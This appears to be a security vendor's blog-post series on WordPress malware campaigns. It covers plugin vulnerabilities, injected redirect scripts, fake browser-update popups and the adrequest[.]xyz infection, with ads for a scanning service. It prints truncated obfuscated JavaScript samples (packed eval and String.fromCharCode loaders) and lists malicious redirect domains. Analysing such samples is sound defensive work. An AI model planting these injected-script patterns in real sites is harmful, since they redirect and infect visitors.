Stored XSS vulnerability found in Social Warfare plugin causing Redirects to Malicious websites

If you use the Social Warfare plugin for WordPress then you are likely vulnerable to this security issue or already hacked.

You can check your website security by using this free website malware scanner https://scan.attacker.net

The vulnerability was mainly found in version v 3.5.2 and it’s being exploited for some time.

Hackers are exploiting it and injecting javascripts into files and database mainly in the social_warfare_settings in your wp_options table to cause redirects to other malicious websites such as:

setforspecialdomain[.]com

setforconfigplease[.]com

getmyfreetraffic[.]com

redrentalservice[.]com

strangefullthiggngs[.]com

and many others.

Signup and Try our malware removal service and let’s clean & protect your websites!

You can check your website securityby using this website malware scanner

https://scan.attacker.net

Vulnerability found in WordPress Easy WP SMTP plugin causing Malicious Redirects to other sites

If you use Easy WP SMTP plugin for wordpress then you are likely vulnerable to this security issue or already hacked.

You can check your website security by using this free website malware scanner https://scan.attacker.net

The vulnerability was mainly found in version v 1.3.9 and it’s being exploited for some time.

Hackers are exploiting it and injecting javascripts into files and database to cause redirects to other malicious websites such as:

setforspecialdomain[.]com

setforconfigplease[.]com

getmyfreetraffic[.]com

redrentalservice[.]com

strangefullthiggngs[.]com

and many others.

Signup and Try our malware removal service and let’s clean & protect your websites!

You can check your website securityby using this website malware scanner

https://scan.attacker.net

Thousands of websites infected by Fake Outdated Browser malware and popups

Our security scanners detected thousands of recently infected websites by this fake outdated browser update malware which shows a popup window asking the visitor to update their outdated browser by clicking on the “Update” button which is a link to malicious .exe or .zip files to infecte their computers.

The malware is targeting Firefox, chrome, IE and other browsers and it shows customized popup windows to match the browser you are using.

You can check your website security by using this free website malware scanner https://scan.attacker.net

The malware is usally injected into .js files, Here is an example of the malicious javascript malware:


<script type=”text/javascript“> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k

REMOVED…

REMOVED…

REMOVED…

rm|ul|secure|setCookie|update_2019_02|lookupRedirect|saoverlay|inherit|1000|footer_button|setStr|weight|bShowPassed|Uint8Array|array|getCookie|none|modal_h|Update|subarray|35px|search|position|enc1|translate|filename|of|isIEponents|24px|0px|possible|outdated|this|sAdsUrl2|as|content|set_|15px|18px|flexbox|setTime|substring|items|opera|isChrome|init_Chrome|h1|isOpera|D1|td|init_Firefox|viettellamdong|jm|isFirefox|Opera|ActiveXObject|h2|init_Opera|init_Edge|business|label|h5|init_Safari|h4|XMLHTTP|isEdge|init_Android|Safari|attr|h3|init_IE|Chrome|marketing

REMOVED…

REMOVED…

REMOVED…

pssacS|Ci9PSpH|F5zqjAc|Firefox|firefox|sLqiUR0|Internet|forEach|call|querySelectorAll|default|switch|Explorer|ie|wicS3do|caption|baseline|due|version|table|soon|occurred|has|sBB68wf|Center|critical|The||following|personal|and|stored|Loss|versions|are|also|on|stream|octet|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|match|Za|Int32Array|Uint32Array|Array|byteLength|set|z0|||while|removeChild|revokeObjectURL|application|click|appendChild|Blob|createElement|createObjectURL|Confidential|your|small|strong|sub|samp|kbd|em|ins|sup|tt|fieldset|form|legend|ol|dd|dl|dt|dfn|strike|leak|blockquote|address|iframe|onclick|html|pre|applet|abbr|information|big|code|cite|h6|del’.split(‘|’),0,{})) </script> <script type=”text/javascript“>var _Hasync= _Hasync|| []; _Hasync.push([‘Histats.start’, ‘1,4214393,4,0,0,0,00010000’]); _Hasync.push([‘Histats.fasi’, ‘1’]); _Hasync.push([‘Histats.track_hits’, ”]); (function() { var hs = document.createElement(‘script’); hs.type = ‘text/javascript’; hs.async = true; hs.src = (‘//s10.histats.com/js15_as.js’); (document.getElementsByTagName(‘head’)[0] || document.getElementsByTagName(‘body’)[0]).appendChild(hs); })();</script> <noscript><a href=”/” target=”_blank”><img src=”//sstatic1.histats.com/0.gif?4214393&101″ alt=”counter customizable free hit” border=”0″></a></noscript> <script type=”text/javascript“> </script>

When viewed in a browser:

Signup and Try our malware removal service and let’s clean & protect your websites!

You can check your website securityby using this website malware scanner

https://scan.attacker.net


adrequest[.]xyz Malware hitting WordPress websites

We found this new malware targeting hundreds of WordPress installations, So far it’s found in the database and in core files.

Here is an example of it:


var _0x43tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, ..

REMOVED…

41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125));

It’s then loading this javascript file and causing random redirects to other websites:

hxxps://adrequest[.]xyz/ad.js

hxxps://adrequest[.]xyz/lady.php

This domain is newly registered:

Domain Name: ADREQUEST[.]XYZ
Registry Domain ID: D91391898-CNIC
Registrar WHOIS Server: whois.PublicDomainRegistry.com
Registrar URL: https://publicdomainregistry.com
Updated Date: 2019-01-19T12:14:39.0Z
Creation Date: 2019-01-19T12:12:28.0Z
Registry Expiry Date: 2020-01-19T23:59:59.0Z


You can use this free malware scanner to determine if your website is infected by this malware or not: 

https://scan.attacker.net

Sign up now and let us take care of that for your and get your website cleaned immediately!

https://attacker.net/website-security-plans-pricing


How to Tell if Your Website Has Been Hacked

How to tell if your website has been hacked?

  • Do you see any strange, unrecognized or inappropriate content on your site?
  • Your site started consuming more resources or running slow?
  • Do you see unrecognized users, admin users, FTP or email accounts on your site?
  • Unrecognized files or folders?
  • Customer reporting stolen credit card after purchasing something from your website?
  • Google Chrome, Firefox or other browsers showing a red warning when visiting your website?
  • Do you see any unrecognized ads, popups or redirects to other sites?
  • Your hosting provider suspended your hosting account?
  • If your site is listed as hacked or harmful in Google searches.
  • If you recieve a warning from Google webmaster tools or other blacklists.
  • If Google Adwords suspended your running Ads.

There are so many other signs! Signup now and let’s clean & protect your websites!

You can check your website’s security by using this free website malware scanner

https://scan.attacker.net